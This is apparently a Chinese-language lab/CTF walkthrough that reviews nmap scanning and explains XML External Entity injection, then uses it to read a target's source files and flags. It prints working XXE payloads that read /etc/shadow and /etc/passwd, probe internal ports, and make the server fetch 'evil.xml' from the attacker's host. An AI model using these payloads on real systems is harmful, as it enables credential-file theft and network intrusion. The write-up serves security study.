開始之前先回憶一下nmap
一直都知道nmap功能很強大,但是平時工作中就只用來掃描端口,漸漸的都忘記了其它的功能及使用方法,正好今天做靶場需要用nmap進行存活主機發現,總結下nmap的使用方法。
場景一:主機發現
nmap -sP 192.168.44.0/24 使用ping命令來發現存活主機
場景二:端口掃描
nmap -v -sV -p- 192.168.44.138
再學習一下xxe
DTD是XML的構建模塊。一般都是在XML文件內部聲明,但是也可以外部引用,外部引用這就容易出問題了。
引用外部DTD的格式
<!DOCTYPE 根元素 SYSTEM "文件名">
<?DOCTYPE 根元素 PUBLIC "public_ID""文件名">
引用外部實體
<!ENTITY 實體名稱 SYSTEM "URI">
<!ENTITY 實體名稱 PUBLIC "public_ID""URI">
XML外部實體注入(XML External Entity)
當允許引用外部實體時,通過惡意構造,可導致
1,任意文件讀取
<!DOCTYPE example [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>
<root>&xxe;</root>
2,執行系統命令
3,探測內網端口
http://192.168.0.145:65412/?xml=<!DOCTYPEexample [<!ENTITY xxe SYSTEM"http%3A%2f%2f192.168.0.145%3A22%2f123">]><root>%26xxe%3B<%2Froot>
4,攻擊內網網站
但是不同的程序支持的協議不一樣,可以利用這些僞協議完成上述的利用:
libxml2:file http ftp
php:file http ftp php compress.zlib compress.bzip2 data glob phar
java:http https ftp file jar netdoc mailto gopher *
.NET:file http https ftp
挖掘流程:
1,檢測XML是否會被解析
[html] view plain copy
<?xml version=”1.0” encoding=”UTF-8”?>
<!DOCTYPE ANY [
<!ENTITY test “this is test”>
]>
<root>&test;</root>
如果$test;變成了”this is test”,那就繼續第二步。
(2)檢測服務器是否支持外部實體:
[html] view plain copy
1. <?xml version=”1.0” encoding=”UTF-8”?>
2. <!DOCTYPE ANY [
3. <!ENTITY % shit SYSTEM “http://youhost/evil.xml”>
4. %shit;
5. ]>
通過查看自己服務器上的日誌來判斷,看目標服務器是否向你的服務器發了一條請求evil.xml的HTTP request。
(3)如果上面兩步都支持,那麼就看能否回顯。如果能回顯,就可以直接使用外部實體的方式進行攻擊。當然有時候服務器會不支持一般實體的引用,也就是在DTD之外無法引用實體,如果這樣的話,只能使用Blind XXE攻擊。
(4)如果不能回顯,毫無疑問,使用Blind XXE攻擊方法。
3,發現開啓80端口
4,使用dirsearch進行目錄掃描
5,訪問robots.txt
6,
7,抓包發現了有意思的東西
8,發現可以利用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>admin123</password></root>
base64解密之後,發現用戶名和密碼存在源碼當中,MD5解密,發現用戶名爲admin@123
<?php
session_start();
?>
<html lang = "en">
<head>
<title>admin</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username'])
&& !empty($_POST['password'])) {
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
$_SESSION['valid'] = true;
$_SESSION['timeout'] = time();
$_SESSION['username'] = 'administhebest';
echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
echo $flag;
}else {
$msg = 'Maybe Later';
}
}
?>
</div> <!-- W00t/W00t -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
</div>
</body>
</html>
使用admin.php當中發現的用戶和密碼進行登錄
點擊紅色的Flag跳轉到404
一猜就知道在xxe目錄下
發現很多靶場都要有一個文件包含、文件讀取漏洞,必須得讀源碼纔可以,不然就很難做下去,還可以鍛鍊一下自己的代碼審計能力。
所以,使用xxe讀取flagmeout.php文件
base64解密發現第一個flag
看着這個flag應該也是編碼了,百度下,發現是base32編碼
我去,再進行base64解碼吧
繼續讀取/etc/.flag.php源碼,base64解碼得
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
這是個啥,很像以前做過的一個靶場中的ook編碼
先百度一下,發現是PHP代碼,加上標識符<?php ?>,找個在線運行PHP代碼的環境,運行一下就能得到
到此靶場完成。